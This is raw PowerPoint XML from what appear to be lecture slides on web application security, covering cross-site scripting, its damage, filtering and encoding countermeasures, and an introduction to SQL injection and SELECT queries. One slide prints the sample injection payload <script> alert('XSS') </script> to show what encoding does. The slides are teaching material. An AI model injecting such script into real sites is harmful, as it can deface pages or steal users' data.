          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Self-Propagation XSS Worm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFBE9115-7E2D-8548-B575-4A7EA5CD7ADD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="205" name="Shape 205"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="751026" y="1125015"/>
            <a:ext cx="7641949" cy="3820975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="429877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330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>XSS Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Shape 100"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637953" y="944563"/>
            <a:ext cx="7921847" cy="3303587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>These channels are supposed to be data channels. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>But data provided by users can contain HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>markups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and JavaScript code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If the input is not sanitized properly by the website, it is sent to other users’ browsers through the channel and gets executed by the browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Browsers consider it like any other code coming from the website. Therefore, the code is given the same privileges as that from the website.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277221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C470EC-3511-416F-A259-B11C03C41A3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web application security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7421C2B0-3E64-44F0-B03B-1A077B50E1F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Ringside Narrow A"/>
              </a:rPr>
              <a:t>Attackers can use different techniques to target web application and compromise your machines, steal information, and trick you into carry out activities without your knowledge.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="191919"/>
              </a:solidFill>
              <a:latin typeface="Ringside Narrow A"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A27E55"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>deals specifically with the security surrounding websites, web applications and web services.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1651683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30851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Damage Caused by XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Shape 106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Web defacing: The injected JavaScript code can make arbitrary changes to the page. Example: JavaScript code can change a news article page to something fake or change some pictures on the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Spoofing requests: The injected JavaScript code can send HTTP requests to the server on behalf of the user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Stealing information: The injected JavaScript code can also steal victim’s private data including the session cookies, personal data displayed on the web page, data stored locally by the web application.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="641820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330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Shape 252"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="944563"/>
            <a:ext cx="7645400" cy="4105902"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The Filter Approach:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Removes code from user inputs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>It is difficult to implement as there are many ways to embed code other than &lt;script&gt; tag.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Use of open-source libraries that can filter out JavaScript code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The Encoding Approach:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Replaces HTML markups with alternate representations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If data containing JavaScript code is encoded before being sent to the browsers, the embedded JavaScript code will be displayed by browsers, not executed by them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Converts &lt;script&gt; alert(‘XSS’) &lt;/script&gt; to &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>lt;script&amp;gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(‘XSS’) &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>rlm;script&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3809886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a:t>Countermeasures to Injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Filter and sanitize all user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to account for every potentially valid encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make no assumptions about the range of possible user inputs—trust nothing, check everything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use access control mechanisms on backend servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400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2F5A62-0136-2B47-AC97-51F2AA14B873}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="849659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D2E8-0DEC-3E48-8304-D0885A727C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>demo:  SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CACE1B95-A062-8E4F-9A7E-61C95CE8B29A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Another example: SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Main reason: not checking user input before using it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2467810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EDA2C-B979-9A4B-8B2C-E1842049C7C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Queries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22364DA5-9ACD-A648-98B1-569A4D76298B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(Structured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Language)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a standard language for interacting with a relational database management system (RDBMS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many web applications take inputs from users, and then use these inputs to construct SQL queries, so the web applications can pull the information out of the database. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web applications also use SQL queries to store information in the database. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the SQL queries are not carefully constructed, SQL-injection vulnerabilities can occur. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incorrect handling of input to these queries can result in severe vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3926800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a:t>SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL injection is a code injection technique that exploits the vulnerabilities in the interface between web applications and database servers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The vulnerability is present when user's inputs are not correctly checked within the web applications before sending to the back-end database servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injecting SQL code into an exchange between an application and its database server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{032493FD-AF01-F84F-86AF-A50C52F642BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4305300" y="3676650"/>
            <a:ext cx="4095750" cy="323165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Let’s take a look at several basic SQL quires.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119376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sz="3200" dirty="0"/>
              <a:t>SQL Tutorial: SELECT Statement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8C6E43"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> statement is the most common operation on databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It retrieves information from a database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="330200" y="1633538"/>
            <a:ext cx="8729488" cy="3303587"/>
            <a:chOff x="405245" y="2657325"/>
            <a:chExt cx="10418699" cy="3786005"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7370B42-79B3-46F1-A27D-7054130C60CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect l="21480" t="26512" r="33560" b="35969"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="405245" y="2792565"/>
              <a:ext cx="6999808" cy="3650765"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Arrow Connector 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFD7C6FD-CF86-42FC-B7AF-B245AEDB0EED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3583172" y="2913803"/>
              <a:ext cx="440187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BB683676-119A-47EB-BDEE-65C649C332F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8091377" y="2657325"/>
              <a:ext cx="2732567" cy="1046440"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1500" dirty="0"/>
                <a:t>Asks the database for all its records, including all the columns</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Straight Arrow Connector 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A7ADBB2-87E1-47B5-BFA6-DA2CCE93DD30}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5107173" y="4724882"/>
              <a:ext cx="298420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8E4A6E12-DA7A-4FC5-A101-10C304CF343C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8135981" y="4463272"/>
              <a:ext cx="2486891" cy="1046440"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1500" dirty="0"/>
                <a:t>Asks the database only for Name, EID and Salary columns</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
